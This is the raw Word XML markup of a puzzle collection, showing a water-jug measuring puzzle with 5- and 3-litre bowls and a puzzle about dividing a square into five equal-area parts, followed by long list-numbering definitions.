      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> of water to mix up some special formula for your </w:t>
      </w:r>
      <w:r w:rsidR="007213E8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>award-winning</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> roses.</w:t>
      </w:r>
      <w:r w:rsidR="007213E8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>But you only have a 5-liter and a 3-liter bowl, but do have access to plenty of water.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8D4D99" w14:textId="4772023D"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How would you measure exactly 4 </w:t>
      </w:r>
      <w:r w:rsidR="007213E8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>litres</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E68DEB" w14:textId="7BE47D2B" w:rsidR="00340E57" w:rsidRPr="00CE4B95" w:rsidRDefault="00512209" w:rsidP="00FC2EFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="710"/>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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>litre</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>. The 5-liter bowl now has exactly 4 litres.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2013C47D" w14:textId="63B2C64D" w:rsidR="00E87629" w:rsidRPr="00CE4B95"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3922" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5424FEE7" w14:textId="1CE09F68" w:rsidR="00512209" w:rsidRPr="00CE4B95" w:rsidRDefault="00512209">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="975" w:name="_Toc197868189"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Puzzle – 3</w:t>
      </w:r>
      <w:bookmarkEnd w:id="975"/>
    </w:p>
    <w:p w14:paraId="0BD47E0E" w14:textId="19BD11B2" w:rsidR="00CE62DE" w:rsidRPr="00CE4B95" w:rsidRDefault="00CE62DE" w:rsidP="00CE62DE">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Divide square in 5 equal parts?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39034EE4" w14:textId="77777777" w:rsidR="001B5DCF" w:rsidRPr="00CE4B95" w:rsidRDefault="001B5DCF" w:rsidP="00FC2EFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="710"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>One small square in the center (1/5 area)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Four equal corner shapes (each 1/5 area)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF64C48" w14:textId="77777777" w:rsidR="001B5DCF" w:rsidRPr="00CE4B95" w:rsidRDefault="001B5DCF" w:rsidP="001B5DCF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">This gives </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5 equal-area parts</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>, not necessarily identical in shape.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A488D9B" w14:textId="78917856" w:rsidR="00E87629" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00E87629">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="2C6D4F8C">
          <v:rect id="_x0000_i3923" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CFD22C" w14:textId="77777777" w:rsidR="00512209" w:rsidRPr="00CE4B95" w:rsidRDefault="00512209" w:rsidP="001B5DCF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5726CF8D" w14:textId="63F77D3D" w:rsidR="006C0B8D" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0B8D" w:rsidP="006C0B8D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="006C0B8D" w:rsidRPr="00CE4B95"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65DF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35EF518D" wp14:editId="39186225">
            <wp:extent cx="13706475" cy="16259175"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="247186512"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5466096D"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7779E9B3" wp14:editId="1B076414">
            <wp:extent cx="4467225" cy="4305300"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="1701355601"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4D3336"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AC84F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7B23A7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0E5C3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1"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7"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7"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9"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6"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8"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4"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7"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776D16"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8388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7"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9"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5"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2"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9"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3"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7"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4"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5"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8"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4"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CDD4838"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E59AD5EE"/>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8"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3"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5"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2"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6"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5"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6"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9"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7"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8"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5"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6"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2"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8"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0"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5"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820758D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E9B8E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7"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1"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3"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D663E22"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A7D04C3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957"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1"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4"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0"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9"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6"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4"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4"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8"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5"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5"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7"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1"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3"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6"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9"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4"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9"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0"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3"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2"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4"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4"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2"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5"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7"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4"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5"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0"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7"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1"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2"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4"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8"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2"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5"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5"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2"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3"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4"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6"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0"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0"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1"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2"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0"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3"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4"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4"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3"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4"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4"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9"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0"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1"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3"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9"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1"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8D78E0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DE1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1"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1"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4"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5"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6"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7"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4"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7"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9"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0"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5"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6"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8"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4"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6"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7"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0"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7"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8"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8"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9"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2"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5"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7"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9"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5"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6"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8"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5"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6"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6"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7"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6"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2"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9"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0"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1"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5"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0"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5"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9"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0"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1"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2"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0"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2"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3"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4"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3"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6"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8"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5"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6"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0"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4"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1"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5"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2"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4"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0"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5"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7"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9"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4"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6"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7"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3"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462EA2"/>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6"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3"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9"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2"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4"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6"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9"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3"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8"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2"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5"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7"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4"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9"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0"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1"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2"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6"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4"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6"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6FE27AA1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="30F8EDC6"/>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4"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0"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2"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3"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4"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5"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6"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7"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8"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0"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3"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4"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6"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31"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4"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9"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4"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0"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1"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1943A4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6D82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4"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5"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1"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2"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4"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9"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0"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7"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0"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2"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3"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5"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8"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0"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4"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0"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2"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6"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8"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4"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5"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7"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8"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2"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3"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9"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0"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8"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3"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6"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7"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8"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3"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5"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5"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6"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8"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9"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1"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3"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4"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6"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7"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0"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6"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8"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2"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5"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6"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7"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8"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0"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2"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3"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3"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4"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6"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4"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8"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0"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1"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2"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4"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8"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9"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0"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1"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2"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3"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6"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="331031730">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="450831633">
    <w:abstractNumId w:val="697"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="456997592">
    <w:abstractNumId w:val="2031"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="687407532">
    <w:abstractNumId w:val="1108"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="33387274">
    <w:abstractNumId w:val="408"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1919943546">
    <w:abstractNumId w:val="452"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1703938822">
    <w:abstractNumId w:val="2038"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="2139058626">
    <w:abstractNumId w:val="302"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="690230264">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="223025705">
    <w:abstractNumId w:val="1037"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="490292977">
    <w:abstractNumId w:val="1072"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1644309830">
    <w:abstractNumId w:val="1369"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="983047797">
    <w:abstractNumId w:val="478"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="760026636">
    <w:abstractNumId w:val="538"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="751588961">
    <w:abstractNumId w:val="1931"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="2052612795">
    <w:abstractNumId w:val="482"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="10377911">
    <w:abstractNumId w:val="1984"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1071655495">
    <w:abstractNumId w:val="1454"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="238682771">
    <w:abstractNumId w:val="1644"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="2136867603">
    <w:abstractNumId w:val="377"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1641037914">
    <w:abstractNumId w:val="216"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="372924120">
    <w:abstractNumId w:val="1436"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="2064479359">
    <w:abstractNumId w:val="1962"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="427580677">
    <w:abstractNumId w:val="1463"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="1615747941">
    <w:abstractNumId w:val="1346"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="1345478961">
    <w:abstractNumId w:val="1780"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="1846820436">
    <w:abstractNumId w:val="1222"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="1055547927">
    <w:abstractNumId w:val="1145"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="365184445">
    <w:abstractNumId w:val="1472"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="2020499067">
    <w:abstractNumId w:val="1895"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="1737388341">
    <w:abstractNumId w:val="1455"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="1408306133">
    <w:abstractNumId w:val="784"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="2056389426">
    <w:abstractNumId w:val="559"/>
  </w:num>
  <w:num w:numId="35" w16cid:durableId="1176076061">
    <w:abstractNumId w:val="1652"/>
  </w:num>
  <w:num w:numId="36" w16cid:durableId="766386780">
    <w:abstractNumId w:val="240"/>
  </w:num>
  <w:num w:numId="37" w16cid:durableId="417599004">
    <w:abstractNumId w:val="125"/>
  </w:num>
  <w:num w:numId="38" w16cid:durableId="2130851324">
    <w:abstractNumId w:val="1241"/>
  </w:num>
  <w:num w:numId="39" w16cid:durableId="2000376965">
    <w:abstractNumId w:val="1075"/>
  </w:num>
  <w:num w:numId="40" w16cid:durableId="1327660895">
    <w:abstractNumId w:val="1044"/>
  </w:num>
  <w:num w:numId="41" w16cid:durableId="485974988">
    <w:abstractNumId w:val="1598"/>
  </w:num>
  <w:num w:numId="42" w16cid:durableId="226380197">
    <w:abstractNumId w:val="276"/>
  </w:num>
  <w:num w:numId="43" w16cid:durableId="144132642">
    <w:abstractNumId w:val="807"/>
  </w:num>
  <w:num w:numId="44" w16cid:durableId="832380636">
    <w:abstractNumId w:val="331"/>
  </w:num>
  <w:num w:numId="45" w16cid:durableId="221598906">
    <w:abstractNumId w:val="420"/>
  </w:num>
  <w:num w:numId="46" w16cid:durableId="1059665607">
    <w:abstractNumId w:val="869"/>
  </w:num>
  <w:num w:numId="47" w16cid:durableId="336886760">
    <w:abstractNumId w:val="825"/>
  </w:num>
  <w:num w:numId="48" w16cid:durableId="983003074">
    <w:abstractNumId w:val="745"/>
  </w:num>
  <w:num w:numId="49" w16cid:durableId="1319385230">
    <w:abstractNumId w:val="1426"/>
  </w:num>
  <w:num w:numId="50" w16cid:durableId="418870768">
    <w:abstractNumId w:val="1425"/>
  </w:num>
  <w:num w:numId="51" w16cid:durableId="1293053620">
    <w:abstractNumId w:val="1299"/>
  </w:num>
  <w:num w:numId="52" w16cid:durableId="330259343">
    <w:abstractNumId w:val="1070"/>
  </w:num>
  <w:num w:numId="53" w16cid:durableId="959918981">
    <w:abstractNumId w:val="1059"/>
  </w:num>
  <w:num w:numId="54" w16cid:durableId="1985967927">
    <w:abstractNumId w:val="1112"/>
  </w:num>
  <w:num w:numId="55" w16cid:durableId="1165164948">
    <w:abstractNumId w:val="1003"/>
  </w:num>
  <w:num w:numId="56" w16cid:durableId="144012283">
    <w:abstractNumId w:val="611"/>
  </w:num>
  <w:num w:numId="57" w16cid:durableId="289016976">
    <w:abstractNumId w:val="778"/>
  </w:num>
  <w:num w:numId="58" w16cid:durableId="955328596">
    <w:abstractNumId w:val="1343"/>
  </w:num>
  <w:num w:numId="59" w16cid:durableId="65498679">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="60" w16cid:durableId="1954828060">
    <w:abstractNumId w:val="504"/>
  </w:num>
  <w:num w:numId="61" w16cid:durableId="21564007">
    <w:abstractNumId w:val="754"/>
  </w:num>
  <w:num w:numId="62" w16cid:durableId="218247474">
    <w:abstractNumId w:val="195"/>
  </w:num>
  <w:num w:numId="63" w16cid:durableId="436369585">
    <w:abstractNumId w:val="1631"/>
  </w:num>
  <w:num w:numId="64" w16cid:durableId="1693535300">
    <w:abstractNumId w:val="1419"/>
  </w:num>
  <w:num w:numId="65" w16cid:durableId="1950039591">
    <w:abstractNumId w:val="1276"/>
  </w:num>
  <w:num w:numId="66" w16cid:durableId="202985444">
    <w:abstractNumId w:val="1622"/>
  </w:num>
  <w:num w:numId="67" w16cid:durableId="1982494743">
    <w:abstractNumId w:val="479"/>
  </w:num>
  <w:num w:numId="68" w16cid:durableId="1018968508">
    <w:abstractNumId w:val="1653"/>
  </w:num>
  <w:num w:numId="69" w16cid:durableId="1899776327">
    <w:abstractNumId w:val="785"/>
  </w:num>
  <w:num w:numId="70" w16cid:durableId="718628838">
    <w:abstractNumId w:val="174"/>
  </w:num>
  <w:num w:numId="71" w16cid:durableId="1092043036">
    <w:abstractNumId w:val="891"/>
  </w:num>
  <w:num w:numId="72" w16cid:durableId="1113092656">
    <w:abstractNumId w:val="1672"/>
  </w:num>
  <w:num w:numId="73" w16cid:durableId="203179248">
    <w:abstractNumId w:val="1430"/>
  </w:num>
  <w:num w:numId="74" w16cid:durableId="165243188">
    <w:abstractNumId w:val="1205"/>
  </w:num>
  <w:num w:numId="75" w16cid:durableId="1408726217">
    <w:abstractNumId w:val="933"/>
  </w:num>
  <w:num w:numId="76" w16cid:durableId="671418661">
    <w:abstractNumId w:val="181"/>
  </w:num>
  <w:num w:numId="77" w16cid:durableId="1070008165">
    <w:abstractNumId w:val="1891"/>
  </w:num>
  <w:num w:numId="78" w16cid:durableId="252202057">
    <w:abstractNumId w:val="1811"/>
  </w:num>
  <w:num w:numId="79" w16cid:durableId="78455010">
    <w:abstractNumId w:val="978"/>
  </w:num>
  <w:num w:numId="80" w16cid:durableId="606431126">
    <w:abstractNumId w:val="995"/>
  </w:num>
  <w:num w:numId="81" w16cid:durableId="1035929636">
    <w:abstractNumId w:val="84"/>
  </w:num>
  <w:num w:numId="82" w16cid:durableId="542327589">
    <w:abstractNumId w:val="546"/>
  </w:num>
  <w:num w:numId="83" w16cid:durableId="790632619">
    <w:abstractNumId w:val="450"/>
  </w:num>
  <w:num w:numId="84" w16cid:durableId="2026662586">
    <w:abstractNumId w:val="844"/>
  </w:num>
  <w:num w:numId="85" w16cid:durableId="2019847301">
    <w:abstractNumId w:val="442"/>
  </w:num>
  <w:num w:numId="86" w16cid:durableId="815728627">
    <w:abstractNumId w:val="693"/>
  </w:num>
  <w:num w:numId="87" w16cid:durableId="452753552">
    <w:abstractNumId w:val="119"/>
  </w:num>
  <w:num w:numId="88" w16cid:durableId="772556685">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="89" w16cid:durableId="1243756152">
    <w:abstractNumId w:val="790"/>
  </w:num>
  <w:num w:numId="90" w16cid:durableId="1791048117">
    <w:abstractNumId w:val="1127"/>
  </w:num>
  <w:num w:numId="91" w16cid:durableId="1383747272">
    <w:abstractNumId w:val="203"/>
  </w:num>
  <w:num w:numId="92" w16cid:durableId="783428819">
    <w:abstractNumId w:val="404"/>
  </w:num>
  <w:num w:numId="93" w16cid:durableId="2108456799">
    <w:abstractNumId w:val="1474"/>
  </w:num>
  <w:num w:numId="94" w16cid:durableId="1499540359">
    <w:abstractNumId w:val="1020"/>
  </w:num>
  <w:num w:numId="95" w16cid:durableId="2077706382">
    <w:abstractNumId w:val="554"/>
  </w:num>
  <w:num w:numId="96" w16cid:durableId="460345401">
    <w:abstractNumId w:val="729"/>
  </w:num>
  <w:num w:numId="97" w16cid:durableId="2070032501">
    <w:abstractNumId w:val="689"/>
  </w:num>
  <w:num w:numId="98" w16cid:durableId="1265380574">
    <w:abstractNumId w:val="701"/>
  </w:num>
  <w:num w:numId="99" w16cid:durableId="111367560">
    <w:abstractNumId w:val="2008"/>
  </w:num>
  <w:num w:numId="100" w16cid:durableId="535696876">
    <w:abstractNumId w:val="421"/>
  </w:num>
  <w:num w:numId="101" w16cid:durableId="1501968499">
    <w:abstractNumId w:val="854"/>
  </w:num>
  <w:num w:numId="102" w16cid:durableId="496966630">
    <w:abstractNumId w:val="1900"/>
  </w:num>
  <w:num w:numId="103" w16cid:durableId="2119328740">
    <w:abstractNumId w:val="957"/>
  </w:num>
  <w:num w:numId="104" w16cid:durableId="1191727682">
    <w:abstractNumId w:val="918"/>
  </w:num>
  <w:num w:numId="105" w16cid:durableId="2006322079">
    <w:abstractNumId w:val="1896"/>
  </w:num>
  <w:num w:numId="106" w16cid:durableId="204604739">
    <w:abstractNumId w:val="459"/>
  </w:num>
  <w:num w:numId="107" w16cid:durableId="1005716549">
    <w:abstractNumId w:val="1960"/>
  </w:num>
  <w:num w:numId="108" w16cid:durableId="1191380425">
    <w:abstractNumId w:val="992"/>
  </w:num>
  <w:num w:numId="109" w16cid:durableId="755976428">
    <w:abstractNumId w:val="1019"/>
  </w:num>
  <w:num w:numId="110" w16cid:durableId="521473325">
    <w:abstractNumId w:val="1881"/>
  </w:num>
  <w:num w:numId="111" w16cid:durableId="1771243832">
    <w:abstractNumId w:val="645"/>
  </w:num>
  <w:num w:numId="112" w16cid:durableId="1206020101">
    <w:abstractNumId w:val="255"/>
  </w:num>
  <w:num w:numId="113" w16cid:durableId="1228418053">
    <w:abstractNumId w:val="1536"/>
  </w:num>
  <w:num w:numId="114" w16cid:durableId="1656178103">
    <w:abstractNumId w:val="2013"/>
  </w:num>
  <w:num w:numId="115" w16cid:durableId="1027222557">
    <w:abstractNumId w:val="1180"/>
  </w:num>
  <w:num w:numId="116" w16cid:durableId="1698920088">
    <w:abstractNumId w:val="926"/>
  </w:num>
  <w:num w:numId="117" w16cid:durableId="1767723753">
    <w:abstractNumId w:val="405"/>
  </w:num>
  <w:num w:numId="118" w16cid:durableId="2096201502">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="119" w16cid:durableId="1543862708">
    <w:abstractNumId w:val="67"/>
  </w:num>
  <w:num w:numId="120" w16cid:durableId="1667317481">
    <w:abstractNumId w:val="1876"/>
  </w:num>
  <w:num w:numId="121" w16cid:durableId="646786314">
    <w:abstractNumId w:val="354"/>
  </w:num>
  <w:num w:numId="122" w16cid:durableId="1803840279">
    <w:abstractNumId w:val="58"/>
  </w:num>
  <w:num w:numId="123" w16cid:durableId="1524442344">
    <w:abstractNumId w:val="347"/>
  </w:num>
  <w:num w:numId="124" w16cid:durableId="1265841922">
    <w:abstractNumId w:val="371"/>
  </w:num>
  <w:num w:numId="125" w16cid:durableId="1455950879">
    <w:abstractNumId w:val="1975"/>
  </w:num>
  <w:num w:numId="126" w16cid:durableId="2092462870">
    <w:abstractNumId w:val="187"/>
  </w:num>
  <w:num w:numId="127" w16cid:durableId="1199389882">
    <w:abstractNumId w:val="823"/>
  </w:num>
  <w:num w:numId="128" w16cid:durableId="1211920811">
    <w:abstractNumId w:val="1512"/>
  </w:num>
  <w:num w:numId="129" w16cid:durableId="307438398">
    <w:abstractNumId w:val="1431"/>
  </w:num>
  <w:num w:numId="130" w16cid:durableId="2069649870">
    <w:abstractNumId w:val="931"/>
  </w:num>
  <w:num w:numId="131" w16cid:durableId="2002075524">
    <w:abstractNumId w:val="350"/>
  </w:num>
  <w:num w:numId="132" w16cid:durableId="1817064155">
    <w:abstractNumId w:val="1743"/>
  </w:num>
  <w:num w:numId="133" w16cid:durableId="563106813">
    <w:abstractNumId w:val="1976"/>
  </w:num>
  <w:num w:numId="134" w16cid:durableId="2083331473">
    <w:abstractNumId w:val="1354"/>
  </w:num>
  <w:num w:numId="135" w16cid:durableId="1147473299">
    <w:abstractNumId w:val="55"/>
  </w:num>
  <w:num w:numId="136" w16cid:durableId="1517386615">
    <w:abstractNumId w:val="1983"/>
  </w:num>
  <w:num w:numId="137" w16cid:durableId="523399971">
    <w:abstractNumId w:val="1313"/>
  </w:num>
  <w:num w:numId="138" w16cid:durableId="1301880181">
    <w:abstractNumId w:val="857"/>
  </w:num>
  <w:num w:numId="139" w16cid:durableId="693271212">
    <w:abstractNumId w:val="1838"/>
  </w:num>
  <w:num w:numId="140" w16cid:durableId="1369525038">
    <w:abstractNumId w:val="1689"/>
  </w:num>
  <w:num w:numId="141" w16cid:durableId="277764536">
    <w:abstractNumId w:val="969"/>
  </w:num>
  <w:num w:numId="142" w16cid:durableId="1164121903">
    <w:abstractNumId w:val="475"/>
  </w:num>
  <w:num w:numId="143" w16cid:durableId="1524395060">
    <w:abstractNumId w:val="1210"/>
  </w:num>
  <w:num w:numId="144" w16cid:durableId="517236085">
    <w:abstractNumId w:val="200"/>
  </w:num>
  <w:num w:numId="145" w16cid:durableId="488714022">
    <w:abstractNumId w:val="1982"/>
  </w:num>
  <w:num w:numId="146" w16cid:durableId="112554757">
    <w:abstractNumId w:val="1525"/>
  </w:num>
  <w:num w:numId="147" w16cid:durableId="316809784">
    <w:abstractNumId w:val="1768"/>
  </w:num>
  <w:num w:numId="148" w16cid:durableId="855659243">
    <w:abstractNumId w:val="1289"/>
  </w:num>
  <w:num w:numId="149" w16cid:durableId="353848829">
    <w:abstractNumId w:val="370"/>
  </w:num>
  <w:num w:numId="150" w16cid:durableId="2093314140">
    <w:abstractNumId w:val="1433"/>
  </w:num>
  <w:num w:numId="151" w16cid:durableId="668019560">
    <w:abstractNumId w:val="1977"/>
  </w:num>
  <w:num w:numId="152" w16cid:durableId="590818562">
    <w:abstractNumId w:val="1830"/>
  </w:num>
  <w:num w:numId="153" w16cid:durableId="322009631">
    <w:abstractNumId w:val="1370"/>
  </w:num>
  <w:num w:numId="154" w16cid:durableId="1428036648">
    <w:abstractNumId w:val="1424"/>
  </w:num>
  <w:num w:numId="155" w16cid:durableId="1122115399">
    <w:abstractNumId w:val="741"/>
  </w:num>
  <w:num w:numId="156" w16cid:durableId="1762992193">
    <w:abstractNumId w:val="263"/>
  </w:num>
  <w:num w:numId="157" w16cid:durableId="1856534610">
    <w:abstractNumId w:val="1109"/>
  </w:num>
  <w:num w:numId="158" w16cid:durableId="2075927805">
    <w:abstractNumId w:val="1186"/>
  </w:num>
  <w:num w:numId="159" w16cid:durableId="1129010005">
    <w:abstractNumId w:val="814"/>
  </w:num>
  <w:num w:numId="160" w16cid:durableId="886376887">
    <w:abstractNumId w:val="1323"/>
  </w:num>
  <w:num w:numId="161" w16cid:durableId="2025283188">
    <w:abstractNumId w:val="1332"/>
  </w:num>
